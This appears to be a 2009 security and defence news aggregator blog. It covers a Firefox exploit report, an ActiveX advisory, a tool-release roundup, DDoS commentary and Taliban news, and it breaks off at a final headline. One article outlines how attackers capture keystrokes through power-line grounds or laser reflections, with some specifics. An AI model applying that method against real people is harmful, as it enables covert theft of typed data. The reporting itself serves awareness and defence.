The exploit portal Milw0rm has published an exploit for Firefox 3.5. The exploit demonstrates a security vulnerability by starting the Windows calculator. In testing by heise Security, the exploit crashed Firefox under Vista, but security service providers Secunia and VUPEN confirmed that attackers using prepared websites can infect PCs. The cause of the problem is a buffer overflow when processing specially prepared Font tags.

The Mozilla Foundation has been informed about the problem, but so far has not responded to queries by heise Security. An update does not currently exist. So far there are no reports of sites on the internet being first to use the hole for active infections and exploitation of Windows PCs. Since the published exploit uses PC heap spraying under JavaScript, disabling JavaScript should act as a stop gap. When the exploit was tested with Windows 7 RC1, after a short time, the browser displayed a dialogue offering to abort the script.

See also:

• Mozilla Firefox Memory Corruption Vulnerability, a report from Secunia.
• Mozilla Firefox Elements Handling Memory Corruption Vulnerability, a report from VUPEN.

Taliban: Mullah Fazlullah, Swat Leadership Safe

Via The Long War Journal -

Swat Taliban leader Mullah Fazlullah and the rest of the group's most senior commanders have escaped the Pakistani government's operation, a Taliban spokesman said.

Mullah Omar, a spokesman for the Movement of the Taliban in Pakistan, denied reports from the government and the military that Mullah Fazlullah had been gravely wounded during airstrikes in his home town of Imam Dehri.

"Fazlullah is safe and the government claim is totally baseless," Omar told Pakistani journalists. He also said the Taliban leadership had gone underground "as part of their overall strategy" once the Army launched operations in Buner, Dir, and Swat, Daily Times reported.

An unconfirmed report in the BBC seemed to corroborate the government's claims that Fazlullah is near death.

"He is now stranded in Imam Dehri without any access to medical assistance and is close to death," a local Swati with purported connections to the Taliban told the BBC. He also stated that Shah Doran, Fazlullah's second-in-command, who, like his boss, is infamous for his radical sermons and death threats issued on illegal FM radio channels, had been killed. But Doran's death has not been confirmed, either.

Omar's statements were made as Fazlullah released an audiotape to the Pakistani media. Fazlullah also stated that the Taliban leadership is intact and his forces would continue to fight for the imposition of sharia, or Islamic law.

So far, the government has failed to kill or capture Fazlullah, Doran, Ibn Amin, Muslim Khan, and 17 other most senior lieutenants who have bounties on their heads for information leading to their capture.

And although the military claims that the Swat Taliban's second and third tier leaders have been wiped out, strong resistance remains in the district despite the military's declaration that the operation has been completed. The military has also said, however, that its forces will remain in Swat as the Taliban remains strong in some pockets.

While efforts to kill or capture the Swat Taliban's senior leaders falter, the government recently released Sufi Mohammed, the pro-Taliban cleric behind the Malakand Accord, who is also Fazlullah's father-in-law. The Malakand Accord amounted to an admission of the government's defeat and emboldened the Taliban to seize more territory in the northwest.

Graffiti Taxonomy: Paris, 2009…

Graffiti Taxonomy: Paris, 2009 from Evan Roth on Vimeo.

A study depicting the stylistic diversity found in Parisian graffiti tags. Now on display at Fondation Cartier’s Born In The Streets - Graffiti exhibition until November 29, 2009.

http://fffff.at/graffiti-taxonomy-paris-2009/

Two French Security Advisers Kidnapped in Somalia

Via BBC -

Two French security advisers helping the Somali government have been kidnapped in the capital Mogadishu, French officials have said.

Gunmen who were wearing police uniforms entered the hotel where the two were staying and took them away, eyewitnesses said.

The abductions took place in a government-held part of Mogadishu.

Islamist rebels are battling troops from the UN-backed interim government for control of the city.

The French foreign ministry said the two advisers were in Mogadishu on an official mission to provide help to the government.

They were seized at the Sahafi Hotel, which has often accommodated foreign journalists and Somali government ministers.

Hotel workers told BBC Somali that the two had checked in as journalists. A Somali official later told Reuters new agency they had done so for their own protection.

The kidnappings come two days after government troops forced Islamist militants from positions around the presidential palace.

Some of the 4,300 African Union peacekeepers in Mogadishu helped push back the insurgents.

The radical rebel group al-Shabab and its allies have been trying to topple the fragile interim government, led by moderate Islamist President Sheikh Sharif Sheikh Ahmed.

Al Qaida: Western Spies Multiply “Like Locusts”

Via FAS Secrecy News Blog -

From the point of view of an al Qaida military leader, Western intelligence agents are now ubiquitous in the lands of Islam, and their operations have been extraordinarily effective. The Western spies are unfailingly lethal, leaving a trail of dead Islamist fighters behind them. Worst of all, they have managed to recruit innumerable Muslims to assist their war efforts.

“The spies… were sent to penetrate the ranks of the Muslims generally, and the mujahidin specifically, and [they] spread all over the lands like locusts,” wrote Abu Yahya al-Libi, an al Qaida field commander in Afghanistan, in a new book called “Guidance on the Ruling of the Muslim Spy” (pdf).

“The spies are busy day and night carrying out their duties in an organized and secret manner… How many heroic leaders have been kidnapped at their hands? How many major mujahidin were surprised to be imprisoned or traced? Even the military and financial supply roads of the mujahidin, which are far from the enemy’s surveillance, were found by the spies.”

Al Qaida operations have been severely impeded by the intelligence war against them, al-Libi said. “As soon as the mujahidin get secretly into an area on a dark night, they are confronted by the Cross forces and their helpers. Many are killed or captured.”

Western spies are found under every conceivable cover, al-Libi wrote. “They have among them old hunchbacked men who cannot even walk, strong young men, weak women inside their house, young girls, and even children who did not reach puberty yet. The spy might be a doctor, nurse, engineer, student, preacher, scholar, runner, or a taxi driver. The spy can be anyone….”

“The occupation armies completely rely on recruiting spies and informants from the Muslim lands they usurped and conquered… The spy lives among Muslims, being one of them: living their life, wearing their dress, eating what they eat… Therefore, he can access what the armed soldiers of the occupation cannot put hands on.”

In the new book, published in Arabic (pdf) on jihadist websites on June 30, al-Libi ruminated at length on the religious and legal problem of the Muslim spy. Can there be a Muslim who spies against other Muslims or, since such a person would by definition be an apostate, is a Muslim spy a contradiction in terms? May such a person be killed? (It depends.) To convict a spy nowadays is it necessary to rely on the traditional two witnesses? (Again, it depends.) What about a person who is mistakenly executed as a spy? (God will reward him.)

Pervading the book is a sense of the overwhelming impact of U.S. and Allied intelligence operations on jihadist forces, and the willingness of indigenous Muslims to act with Western intelligence against those forces.

[...]

“Guidance on the Ruling of the Muslim Spy” by Abu Yahya al-Libi was translated, rather clumsily, by the DNI Open Source Center. A copy was obtained by Secrecy News.

The book cited the use of electronic homing devices to guide air-launched missiles to their targets and images of several such devices were included in the original Arabic version of the book (at page 146). The purported use of the devices was discussed in “CIA Drone Targeting Tech Revealed, Qaeda Claims” by Adam Rawnsley, Wired Danger Room, July 8, 2009. Memri.org also prepared a proprietary translation of the new Al-Libi book, which was reported by Fox News last week.

DoD Seeks Defense Against Denial-of-Service Attacks

Via FCW.com -

The Defense Information Systems Agency wants commercial products that could help network administrators detect and react to distributed-denial-of-service (DDOS) attacks, according to a request for information posted today.

In such attacks, an individual or group attempts to bring down a Web site by overwhelming it with traffic.

The agency is interested in solutions that could give administrators a clear and timely picture of what is happening on their networks, alert them in the event of suspicious activity and provide options for mitigating attacks, the notice states.

“The goal of this solution is to detect and mitigate all DDOS attempts to disrupt [Defense Department] network communications and to detect internal assets displaying anomalous behavior across the Internet-to-NIPRnet boundary,” the notice states.

---------------

About damn time?

There are several articles making the rounds on the net...claiming the government ignored warnings from South Korea relating possible cyber attacks.

But did they even need a warning relating to DDoS??

Sure...in my view, DDoS isn't a super huge threat when compared to SCADA and other real "hacking" attacks...but Mafiaboy took out Yahoo!, Amazon.com, Dell, E*TRADE, eBay, and CNN in early 2000.

Isn't 9 years enough of warning?

Anti-Terror Judge Named Greek Intelligence Chief

Via oregonlive.com -

Greece's top judge involved in organized crime and terrorism cases has been named as the new director of the country's National Intelligence Service.

The appointment was announced Monday as Greek authorities are grappling with a resurgence of terrorist bombings and shootings by far-left domestic groups.

Senior judge Dimitris Papangelopoulos takes over from Ioannis Corantis, a veteran diplomat who headed the service since 2004.

Militant attacks have increased in recent months following the fatal police shooting of an Athens teenager in December, which sparked the country's worst rioting in decades.

McCain Moves to Cut F-22 Funding

Via Military.com -

Sen. John McCain moved Monday to eliminate $1.75 billion recently inserted into the proposed 2010 defense budget for more fighter jets from Lockheed Martin.

The Arizona Republican, along with Michigan Democrat Carl Levin, filed an amendment to cut the extra money for seven more F-22's. The Senate Armed Services Committee last month narrowly approved the additional funding requested by Georgia Republican Saxby Chambliss.

McCain and Levin, the committee's chairman, voted against the additional finds. The full Senate may vote on the defense spending bill this week. The House last month voted to include a $369 million down payment for 12 additional fighters to its version of the defense bill.

The White House has threatened to veto legislation that includes money for more of the radar-evading jets.

On the Senate floor, McCain said he also will strongly recommend the White House veto the defense bill if lawmakers don't act to end F-22 production.

Supporters of the F-22 have said capping production at 187 aircraft is too risky with potential adversaries like Iran, North Korea and China looming.

McCain disputed such arguments. Focusing on timely delivery of the Joint Strike Fighter, also built by Lockheed Martin, is in the best interest of the country and will be a weapon system that can meet future threats, he said.

Chambliss and other lawmakers who represent districts where F-22 production jobs are at stake have lobbied hard to keep the program. Lockheed's primary manufacturing plant is in Georgia, but key parts of the plane also are made in Texas and California.

McCain said the rationale for keeping a weapon system should never be about job creation, but about defending the nation.

The extra money would extend production of the F-22 beyond the 187 aircraft that Defense Secretary Robert Gates says are needed. Gates has argued that buying any more of the jets, which cost $140 million a piece, will undermine the Pentagon's ability to increase the size of U.S. ground forces and purchase gear for fighting unconventional wars against insurgents.

------------------------

See more over @ DoDBuzz.com

The vaunted invincibility of the F-22 founders on two incurable flaws: First, the plane’s so-called “low probability of intercept” radar may now be easily detected, thanks to the proliferation of spread spectrum technology in cell phones and laptops. That creates an environment where, if the F-22 pilot turns on his radar, he announces his presence over hundreds of miles. Even better for the enemy, the radar makes an unmistakable beacon for opposing missiles.

Second, when combat forces F-22 pilots to turn off radars, they’ll find themselves forced into a close-in, maneuvering fight. Compromised by stealth and heavy radar electronics, the plane’s agility, short range missiles, and guns are nothing special — as one of us observed at Nellis Air Force Base in Nevada when an F-16 “shot down” an F-22 in exercises.

As for the plane’s advertised ability to cruise supersonically the F-22’s low fuel capacity (27% of takeoff weight, only two thirds of what’s needed for combat-useful supersonic endurance in enemy airspace) reduces this to an air show trick. Why the big fuel shortfall? To make room for stealth technologies and radar electronics.

In summary, a vote for continuing F-22 production is a vote to decay pilots’ skills, to deny them a truly great fighter, to shrink the number of pilots and planes we can field, and to reward Congress’ unending appetite for pork. The new 2010 Defense Authorization bill should be vetoed if a single F-22 is added.

How to Use Electrical Outlets and Cheap Lasers to Steal Data

Via NetworkWorld -

If attackers intent on data theft can tap into an electrical socket near a computer or if they can draw a bead on the machine with a laser, they can steal whatever is being typed into it.

How to execute these attacks will be demonstrated at the Black Hat USA 2009 security conference in Las Vegas later this month by Andrea Barisani and Daniele Bianco, a pair of researchers for network security consultancy Inverse Path.

“The only thing you need for successful attacks are either the electrical grid or a distant line of sight, no expensive piece of equipment is required,” Barisani and Bianco say in a paper describing the hacks.

The equipment to carry out the power-line attack could cost as little as $500, and the laser attack gear costs about $100 if the attacker already owns a laptop with a sound card, says Barisani. Carrying out the attacks took about a week, he says.

“We think it is important to raise the awareness about these unconventional attacks and we hope to see more work on this topic in the future,” Barisani and Bianco say in their paper. Others with more time and money could doubtless create better spying tools using the same concepts, they say.

In the power-line exploit, the attacker grabs the keyboard signals that are generated by hitting keys. Because the data wire within the keyboard cable is unshielded, the signals leak into the ground wire in the cable, and from there into the ground wire of the electrical system feeding the computer. Bit streams generated by the keyboards that indicate what keys have been struck create voltage fluctuations in the grounds, they say.

Attackers extend the ground of a nearby power socket and attach to it two probes separated by a resistor. The voltage difference and the fluctuations in that difference – the keyboard signals – are captured from both ends of the resistor and converted to letters.

To pull the signal out of the ground noise, a reference ground is needed, they say. “A “reference” ground is any piece of metal with a direct physical connection to the Earth, a sink or toilet pipe is perfect for this purpose (while albeit not very classy) and easily reachable (especially if you are performing the attack from [a] hotel room,” they say in their paper.

Since keyboards and mice signals are in the 1 to 20 kHz range, a filter can isolate that range for listening, they say.

Variations in individual keyboards and mice result in each keyboard signaling in a slightly different frequency range. With careful filtering, that makes it possible to zero in on a particular keyboard in an environment where many keyboards are in use, the researchers say.

The attack proved successful when tapping electric sockets located up to 15 meters from where the target computer was plugged in the researchers say.

This method would not work if the computer were unplugged from the wall, such as a laptop running on its battery. The second attack can prove effective in this case, Bianco’s and Barisani’s paper says.

Attackers point a cheap laser, slightly better than what is used in laser pointers, at a shiny part of a laptop or even an object on the table with the laptop. A receiver is aligned to capture the reflected light beam and the modulations that are caused by the vibrations resulting from striking the keys.

This modulation is converted to an electrical signal that is fed into a computer soundcard.

“The vibration patterns received by the device clearly show the separate keystrokes,” the researchers’ paper says. Each key has a unique vibration pattern that distinguishes it from the rest. The spacebar creates a significantly different set of vibrations, so the breaks between words are readily apparent.

Analyzing the sequences of individual keys that are struck and the spacing between words, the attacker can figure out what message has been typed. Knowing what language is being typed is a big help, they say.

Laptop lids, especially shiny logos and areas close to the hinges, provide the most easily read vibrations.

Anyone worried about this type of attack can make sure there is no line of sight to the laptop, move position frequently while typing and polluting the signal by striking random keys and later deleting them with the backspace key.

While they admit their hacking tools are rudimentary, they believe they could be improved upon with a little time, effort and backing.

“If our small research was able to accomplish acceptable results in a brief development time (approximately a week of work) and with cheap hardware,” they say. “Consider what a dedicated team or government agency can accomplish with more expensive equipment and effort.”

Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution

Via SAS Internet Storm Center -

Microsoft has released an advisory related to an Office Web Components ActiveX vulnerability, it is available here. This vulnerability exists in the ActiveX control used by IE to display Excel spreadsheets. The CVE entry for the vulnerability is CVE-2009-1136. Microsoft mentions that they are aware of active exploits against this vulnerability, although we at the SANS Internet Storm Center haven't seen it used or mentioned in public as of yet. Which may tend to indicate it has been used in targeted rather than broad based attacks. At the moment there is no patch, there is a workaround, and it can be automated for enterprise deployment. The specific CLSIDs to set the killbit for are:

{0002E541-0000-0000-C000-000000000046}
{0002E559-0000-0000-C000-000000000046}

Start working on this on ASAP. The impact is remote code execution with the privileges of the logged in user running Internet Explorer, and might not require user intervention. As in browse to a nasty web site and be pwn3d.

Advisory: http://www.microsoft.com/technet/security/advisory/973472.mspx

KB article: http://support.microsoft.com/kb/973472

SRD blog: http://blogs.technet.com/srd/archive/2009/07/13/more-information-about-the-office-web-components-activex-vulnerability.aspx

MSRC blog: http://blogs.technet.com/msrc/archive/2009/07/13/microsoft-security-advisory-973472-released.aspx

[...]

Update1: The vulnerability is being actively exploited on web sites. More to follow.

Tools of the Trade - Microsoft Video ActiveX Control 0day Edition

Cody Pierce of TippingPoint DVLabs recently blogged a detailed technical analysis of the recent Microsoft Video ActiveX Control (msvidctl.dll) 0day, which many are expecting Microsoft to patch early next week.

Microsoft also plans to patch the currently open Directshow vulnerability...

--------------------

On to the tools....

On July 11th, Sun released Virtual Box v3.0.2. VirtualBox is a general-purpose full virtualizer for x86 hardware. This is a maintenance release of VirtualBox 3.0 which improves stability and performance. Check out the changelog for all the details.

On July 9th, Frederic Raynal & Guillaume Delugre released origami 1.0.0-beta0. Origami is a Ruby framework designed to parse, analyze, edit, manipulate, forge, exploit PDF files. This is NOT a PDF rendering library. It aims at providing a scripting tool to generate and/or analyze malicious PDF files. As well, it can be used to create on-the-fly customized PDFs, or to inject (evil) code into already existing documents.

On July 8th, Gabriel Campana released Fuzzgrind 090622. Fuzzgrind is a fully automatic fuzzing tool, generating test files with the purpose of discovering new execution paths likely to trigger bugs and potentially vulnerabilities. It is based on the concept of symbolic execution.

On July 8th, Drew Yao of Apple Product Security announced the release of CrashWrangler. CrashWrangler is basically Apple's version of the !expoitable tool released by Microsoft. It is a set of tools to determine if a crash is an exploitable security issue, and if a crash is a duplicate of another known crash. The exploitability diagnosis is intended to be used when you have a reproducible test case, but the duplicate detection can be run on any crash log. CrashWrangler supports Mac OS X 10.5 and later. The toolset is free to anyone with a ADC account.

On July 8th, Terence Stenvold released Harald Scan v0.2. Harald Scan is a Bluetooth discovery scanner written in Python. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list.

On July 7th, VLC Media Player 1.0 was released. VLC media player is a highly portable multimedia player for various audio and video formats as well as DVDs, VCDs, and various streaming protocols without external codec or program. This major release introduces many new features, new formats and new codecs to the VLC multimedia framework and fixes a very high number of bugs that were present in the 0.9.x or 0.8.6 versions.

On June 27th, Tor-ramdisk 20090627 was released. Tor-ramdisk is an i686 uClibc-based micro Linux distribution whose sole purpose is to securely host a Tor server purely in RAM. Check out the changelog for all the details.

On June 26th, Maxim Bourmistrov released Trafscrambler v0.1. Trafscrambler is an anti-sniffer/IDS NKE (Network Kernel Extension) for Mac OS X. This initial release implements SYN-decoy, Pre/Post connections SYN, TCP reset, and zero window attacks. Author tested this on x86 OS X versions 10.5.6 and 10.5.7. It should work on PPC and older releases as well.

On June 25th, Nmap 4.90 RC1 was released. This release fixed a hanging bug in OS X. Check the changelog for all the details.

On June 25th, CCleaner v2.21.940 was released. CCleaner is a freeware system optimization, privacy and cleaning tool. It removes unused files from your system - allowing Windows to run faster and freeing up valuable hard disk space. Check the version history for all the details.

On June 25th, Tor v2.0.35 was released. Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. Tor 0.2.0.35 fixes a big bug that was causing Tor relays with dynamic IP addresses to disappear from the network. It also fixes a rare crashbug on fast exit relays. Check out the announcement for all the details.

On June 25th, PHD Virtual released Patch Downloader v6. This tools is a freeware solution to simplify patch downloading for various VMware ESX versions. It ases the pain of downloading patches for various ESX versions from the VMware support site by automating the process for users that cannot use the VMware Update Manager. Now, rather than downloading each patch manually through a Java Download manager, VMware administrators can simply select the version of ESX from the Patch Downloader drop down menu, and select the download location (including folder, drive map, SMB share, etc.).

On June 24th, Kismet-2009-06-R1 was released. Kismet is an 802.11 layer 2 wireless network sniffer. This release drops the "candidate" designation, and is the first full release of the Kismet-Newcore code. It includes a number of UI improvements (better network details, more mouse support, fixed color handling, and nework notes), multiple platform-specific fixes (OS X installation, Nokia ITT bugfixes, and BSD fixes), has improved source handling on Linux, de-cloaked SSID caching, and more. Check out the SVN commit notes for more.

On June 17th, Adobe released Shockwave Player version 11.5.0.600. According to Adobe's Security Bulletin (APSB09-08), this version fixes a vulnerability which could allow an attacker to take control of the affected system.

Russian Military Shot Down Own Planes in Georgian War

Via foreignpolicy.com -

A new report from the Moscow-based Center for Analysis of Strategy and Technology says that half the Russian planes lost in last summer's five-day war were shot down by friendly fire. The latest issue of the Moscow Defense Brief reports that Russia lost six jets in the war with Georgia, not four as officials claimed at the time. At least three were downed by the Russians themselves. The article said:

Russian aircraft were frequently taken by Russian and Ossetian forces for Georgian aircraft, and they were fired upon without identification and in the absence of any aggressive action on their part.

The journal is highly critical of coordination within the Russian military, asserting that the army and the air force ran "completely separate campaigns." It raises concerns as to Russia's capabilities to win a war against a better-trained and better-equipped army in the future.

Pakistani Jets Pound Taliban Hide-outs in South Waziristan

Via Gulfnews.com -

Intelligence officials say fighter jets have pounded suspected militant hide-outs in the South Waziristan tribal region as part of ongoing operations against Pakistani Taliban chief Baitullah Mehsud. At least eight militants were killed.

Meanwhile, police said gunmen ambushed five police officers and a forestry official responding to reports of a dead body in northwestern Pakistan, killing all six.

The fighter jets hit several locations in South Waziristan on Sunday, killing eight militants in one spot, two intelligence officials, who spoke on condition of anonymity because they are not authorised to speak to media, told The Associated Press.

South Waziristan is part of the lawless tribal region along Pakistan's border with Afghanistan, and top Taliban and Al Qaida leaders are believed to be hiding there.

Chinese Spying Claimed in Purchases of NSA Crypto Gear

Via Wired.com -

A Chinese national was indicted this week for conspiring to violate U.S. export law, following a nearly three-year investigation into his alleged efforts to acquire sensitive military and NSA-encryption gear from eBay and other internet sources.

Chi Tong Kuok, of Macau, told Defense Department and Customs investigators that he had been “acting at the direction of officials for the People’s Republic of China,” according to a government affidavit in the case. “Kuak indicated he and PRC officials sought the items to figure out ways to listen to or monitor U.S. government and military communications.”

Kuok was arrested at the Atlanta International Airport last month en route from Paris to Panama, where he allegedly planned to meet an undercover federal agent he believed was going to provide him with military radios. He was transferred to California, where he was indicted (.pdf) Tuesday for money laundering, conspiracy, smuggling and one count of attempting to export a defense article without a license.

[...]

Using a Yahoo e-mail address and a different name, Kuok also allegedly contacted an Arizona company this year that had posted on eBay a KG-175 TACLANE — an NSA designed encryption device used to communicate with classified military computer networks, such as the Defense Department’s SIPRNet.

It’s legal to own the equipment, which can’t access anything without the proper crypto key, but export is tightly restricted. The Arizona company initially refused to ship the NSA gear to Macau, but at the government’s request, later allowed another undercover agent to negotiate a deal with Kuok while posing as a company official.

“In subsequent e-mails, Kuok indicated he was interested in buying the KG-175 if it came with a particular key,” reads an affidavit by John Helsing of the Defense Criminal Investigative Service, who does not elaborate. Kuok allegedly sent the undercover agent $1,700 by Western Union for the crypto device, and then forwarded a list of additional items he wanted. “I am also thinking about if you are FBI or something like that,” Kuok allegedly wrote in an e-mail.

Despite his misgivings, Kuok sent the agent another $10,000 for more PRC-148 radios. “When you send the radios, remove all label and write it as vintage walkie talkie, thank you,” he allegedly instructed.

The undercover agent and Kuok agreed to meet in Panama to complete the delivery. Unfortunately for Kuok, his plane stopped in Atlanta, where he was arrested and held without bail. Investigators reviewed Kuak’s eBay and PayPal accounts and determined he had successfully purchased other export-controlled items online, beginning in 2005.

On Wednesday, the government obtained search warrants for two USB flash drives, a laptop computer and several cell phones Kuok had in his carry-on bag, as well as for a cell phone SIM card in his possession.

“Kuok claimed in his post-arrest interview that his PRC ‘handlers(s)’ gave him a SIM card and instructed him to place it in his phone once he landed in Panama,” wrote Helsing in his affidavit.

Reinventing the Router - From Packet Management to Flow Management

Via spectrum.ieee.org -

The Internet is broken. I should know: I designed it. In 1967, I wrote the first plan for the ancestor of today’s Internet, the Advanced Research Projects Agency Network, or ARPANET, and then led the team that designed and built it. The main idea was to share the available network infrastructure by sending data as small, independent packets, which, though they might arrive at different times, would still generally make it to their destinations. The small computers that directed the data traffic—I called them Interface Message Processors, or IMPs—evolved into today’s routers, and for a long time they’ve kept up with the Net’s phenomenal growth. Until now.

Today Internet traffic is rapidly expanding and also becoming more varied and complex. In particular, we’re seeing an explosion in voice and video applications. Millions regularly use Skype to place calls and go to YouTube to share videos. Services like Hulu and Netflix, which let users watch TV shows and movies on their computers, are growing ever more popular. Corporations are embracing videoconferencing and telephony systems based on the Internet Protocol, or IP. What’s more, people are now streaming content not only to their PCs but also to iPhones and BlackBerrys, media receivers like the Apple TV, and gaming consoles like Microsoft’s Xbox and Sony’s PlayStation 3. Communication and entertainment are shifting to the Net.

But this shift is not without its problems. Unlike e-mail and static Web pages, which can handle network hiccups, voice and video deteriorate under transmission delays as short as a few milliseconds. And therein lies the problem with traditional IP packet routers: They can’t guarantee that a YouTube clip will stream smoothly to a user’s computer. They treat the video packets as loose data entities when they ought to treat them as flows.

Consider a conventional router receiving two packets that are part of the same video. The router looks at the first packet’s destination address and consults a routing table. It then holds the packet in a queue until it can be dispatched. When the router receives the second packet, it repeats those same steps, not ”remembering” that it has just processed an earlier piece of the same video. The addition of these small tasks may not look like much, but they can quickly add up, making networks more costly and less flexible.

At this point you might be asking yourself, ”But what’s the problem, really, if I use things like Skype and YouTube without a hitch?” In fact, you enjoy those services only because the Internet has been grossly overprovisioned. Network operators have deployed mountains of optical communication systems that can handle traffic spikes, but on average these run much below their full capacity. Worse, peer-to-peer (P2P) services, used to download movies and other large files, are eating more and more bandwidth. P2P participants may constitute only 5 percent of the users in some networks, while consuming 75 percent of the bandwidth.

So although users may not perceive the extent of the problem, things are already dire for many Internet service providers and network operators. Keeping up with bandwidth demand has required huge outlays of cash to build an infrastructure that remains underutilized. To put it another way, we’ve thrown bandwidth at a problem that really requires a computing solution.

With these issues in mind, my colleagues and I at Anagran, a start-up I founded in Sunnyvale, Calif., set out to reinvent the router. We focused on a simple yet powerful idea: If a router can identify the first packet in a flow, it can just prescreen the remaining packets and bypass the routing and queuing stages. This approach would boost throughput, reduce packet loss and delays, allow new capabilities like fairness controls—and while we’re at it, save power, size, and cost. We call our approach flow management.

Twitter Suspends User Accounts Infected With Koobface Worm

Via DarkReading -

Twitter is warning members that the Koobface worm is on the loose in the Twitterverse, and that the social network is temporarily suspending any accounts it discovers spreading the worm.

In a blog post last night, Twitter said some Twitter users' PCs were infected with a variant of Koobface, which sends phony tweets when the infected user logs onto his or her Twitter account.

"We are currently suspending all accounts that we detect sending such bogus tweets. If we suspend your account, we will send you an email notifying you of the suspension. This email also includes tips for removing the malware from your PC," the Twitter blog said.

As in previous attacks on other social networking sites, the worm's mode of infection is a phony video link that, when clicked, infects the user with the worm. Among the Koobface tweets are messages similar to ones Koobface used on Facebook -- "My home video," "Watch my new private video! LOL :)" and some links purportedly to Michael Jackson video clips, according to Graham Cluley, senior technology consultant for Sophos. Cluley blogged about the attacks today.

Koobface has been used to target users on Facebook, MySpace, and other social networking sites during the past year, spreading via an infected member's profile to his friends' profiles.

Happy Birthday Nikola Tesla

Nikola Tesla (10 July 1856 – 7 January 1943) was an inventor and a mechanical and electrical engineer. Tesla was an ethnic Serb born in the village of Smiljan, Vojna Krajina, in the territory of today's Croatia. He was a subject of the Austrian Empire by birth and later became an American citizen. He is frequently cited as one of the most important contributors to the birth of commercial electricity, a man who "shed light over the face of Earth". He is best known for many revolutionary contributions in the field of electricity and magnetism in the late 19th and early 20th centuries. Tesla's patents and theoretical work formed the basis of modern alternating current (AC) electric power systems, including the polyphase power distribution systems and the AC motor, with which he helped usher in the Second Industrial Revolution.

The SI unit measuring magnetic flux density or magnetic induction (commonly known as the magnetic field "B"), the tesla, was named in his honor (at the Conférence Générale des Poids et Mesures, Paris, 1960), as well as the Tesla effect of wireless energy transfer to wirelessly power electronic devices which Tesla demonstrated on a low scale (lightbulbs) as early as 1893 and aspired to use for the intercontinental transmission of industrial energy levels in his unfinished Wardenclyffe Tower project.

Aside from his work on electromagnetism and electromechanical engineering, Tesla contributed in varying degrees to the establishment of robotics, remote control, radar and computer science, and to the expansion of ballistics, nuclear physics,[8] and theoretical physics. In 1943, the Supreme Court of the United States credited him as being the inventor of the radio.

Lawmaker Wants ‘Show of Force’ Against North Korea for Website Attacks

Via Wired.com (Threat Level) -

A key Republican lawmaker on Thursday urged President Obama to launch a cyber attack against North Korea, or increase international sanctions against the communist country, in the wake of an unknown hacker’s denial-of-service attacks on U.S. and South Korean websites.

Rep. Peter Hoekstra (R-Michigan), the lead Republican on the House Intelligence Committee, said the U.S. should conduct a “show of force or strength” against North Korea for a supposed role in a round of attacks that hit numerous government and commercial websites this week.

Hoekstra, speaking on the conservative America’s Morning News radio show, produced by the Washington Times newspaper, said that “some of the best people in America” had been investigating the attacks and concluded that most likely “all the fingers” point to North Korea as the culprit.

They’re reaching the conclusion that this was a state act and that “this couldn’t be some amateurs,” claimed Hoekstra, in direct opposition to what security experts have actually been saying.

He added that North Korea needed to be “sent a strong message.”

-------------------------------

Rep. Peter Hoekstra's idea of launching a cyber couterattack against North Korea sounds very knee-jerky and just plain wrong at this point.....

Point One

As Gadi Evron points out in his DarkReading article, it is silly to just look at the technical information (IP address, exploits used and malware family) and think you can determine who is behind a series of DDoS attacks.

Only with a complete analysis of all-source intelligence can you even begin to make an educated guess about who and where the attackers are based.

The private sector has a ton of very smart security professionals...but most don't have access to classified intelligence (HUMINT, SIGINT, etc)....and thus are making an educated guess with just the technical (network, malware analysis, etc) information.

Even with that in mind, some of those professionals aren't on board with pointing the finger @ North Korea just yet...

The timing is auspicious, but none of the data I have suggests North Korea," Jose Nazario, a senior security researcher at Arbor Networks, told CSO earlier this week. Joe Stewart, director of director of SecureWorks' counter-threat unit, told Computerworld, "There's nothing in there to suggest that it's state sponsored."

"Still zero evidence of North Korean involvement," said Stewart when contacted Friday for an update.

Point Two

DDoS attacks are noisy....really dangerous and sophisticated cyber attacks are rarely noisy. In general, I would say attacks like Titan Rain and NASA's Avocado have the potential to damage our national safety & security much much more than any DDoS attack.

DDoS attacks are easy to detect, while that targeted attack against a power plant's SCADA is not. This type of attack could easily be a smokescreen for a much more serious targeted attack.

Point Three

DDoS attacks aren't new...the corporate world has been dealing with these for years. DDoS attacks are a favorite among extortionists for example. The all-volunteer group formerly known as Castlecops put such a dent in cybercrime activities...that bad guys have been trying to DDoS them since 2006.

The methods of protecting against DDoS attacks are just as well known. Clearly, in this case...some sites were better prepared than others. According to the malware analysis conducted by the South Korean anti-virus firm Hauri (PDF)....many non-government sites were targeted.

www.yahoo.com
www.voanews.com
www.amazon.com
www.usbank.com

Were these sites down for an extended amount of time? I wonder why?
Perhaps because they were better prepared for just this type of attack.

Nick Shapiro, a White House spokesman, said that as of the night of July 7, all federal Web sites were back up and running and that the attacks “had absolutely no effect on the White House's day-to-day operations."

"The preventative measures in place to deal with frequent attempts to disrupt WhiteHouse.gov's service performed as planned, keeping the site stable and available to the general public, although visitors from regions in Asia may have been affected," he added.

So perhaps instead of taking about counterattack...the government should think about building a better defense overall.

Tamiflu Detected in River Water in Japan

Via Virology.ws -

Tamiflu (Oseltamivir) is one of the few antiviral drugs available for treatment of influenza. Use of the drug has increased substantially because of the emergence of the 2009 H1N1 pandemic strain, against which no vaccine is yet available. A recent study has shown that low levels of oseltamivir can be detected in the aquatic environment. This finding raises the possibility that aquatic birds which harbor influenza virus could be exposed to the antiviral, leading to selection of drug resistant viruses.

[...]

Because Japan is the largest consumer of Tamiflu, the levels of OC were determined in the Yodo River system in the Kyoto and Osaka prefectures. This river was selected because it is distant from the sea and located in a densely populated area. Surface water was collected before (June 2007) and during (December 2007 and February 2008) the flu season. No OC was detected in water samples from June 2007. At the onset of the flu season, December 2007, the antiviral was found at levels between 2 and 7 nanograms per liter (ng/L). At the peak of the flu season, in February, levels increased to 12 – 58 ng/L. Levels of OC were higher in water samples taken near sewage treatment plants, compared with those obtained farther away. The amounts detected are close to the concentration of drug that causes 50% inhibition of virus replication (the IC₅₀₎ in cell cultures, reported to be between 80–230 ng/L.

The authors suggest that dabbling ducks, a natural reservoir of influenza virus, could ingest OC. As influenza in dabbling ducks is a gastrointestinal infection, the virus would encounter oseltamivir in the gut, which could promote selection of viruses resistant to the drug.

It is not known whether OC in aquatic environments leads to influenza virus resistance to Tamiflu. Clearly additional studies must be done to determine whether the antiviral drug can be found in other waters around the world. Influenza viruses should be isolated from aquatic birds living in OC contaminated environments to monitor resistance to Tamiflu.

PCs Used in Korean DDoS Attacks May Self Destruct

Via Washington Post -

